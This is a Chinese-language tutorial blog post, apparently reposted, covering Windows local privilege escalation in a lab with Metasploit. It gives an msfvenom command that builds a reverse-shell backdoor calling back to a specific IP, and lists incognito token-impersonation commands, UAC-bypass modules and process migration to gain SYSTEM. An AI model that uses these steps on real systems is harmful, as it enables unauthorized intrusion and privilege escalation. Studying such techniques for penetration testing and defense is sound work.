标签：BypassUAC 令牌 WIN 提权 msf UAC 权限

WIN进程注入&BypassUAC&令牌窃取

本地提权—win令牌窃取

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候，需通过假冒域管理员的令牌进行攻击。

我这里用到了windowns2008虚拟机做演示

先用msf生成一个后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe

msf上线

use incognito 导入模块

list_tokens -u 列出进程

impersonate_token "NT AUTHORITY\SYSTEM" 令牌窃取

获得system权限

BypassUAC绕过提权

什么是UAC？如何设置？

UAC（UserAccount Control，用户账户控制）

简言之就是在Vista及更高版本中通过弹框进一步让用户

确认是否授权当前可执行文件来达到阻止恶意程序的目的。

可以通过命令msconfig启动管理器，更改UAC设置等级(默认等级)

参考：http://cn-sec.com/archives/116488.html

BypassUAC提权？常见绕过项目？

为了远程执行目标的exe或者bat可执行文件绕过此安全机制，以此叫BypassUAC

绕过项目：MSF内置，Powershell渗透框架，UACME项目(推荐)

https://github.com/hfiref0x/UACME

在msf自带的提权getsystem中，如果遇到UAC，则不会成功。

win7演示：

使用msf自带模块绕过uac

use exploit/windows/local/bypassuac

getsystem 获得最高权限

另外我用了Win7 虚拟机进行 本地提权

我使用了这个模块：use exploit/windows/local/ask

但是该模块实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC，会触发系统UAC，受害机器有提示，提示用户是否要运行，如果用户选择“yes”，就可以程序返回一个高权限meterpreter shell,相当于钓鱼攻击。

当用户点击”是“后getsystem。

获得最高权限。

进程注入

我用了win2008虚拟机做了演示

ps命令查看进程

migrate PID 迁移对应PID

获得最高权限

标签：BypassUAC,令牌,WIN,提权,msf,UAC,权限
来源： https://www.cnblogs.com/rayob1/p/16095663.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。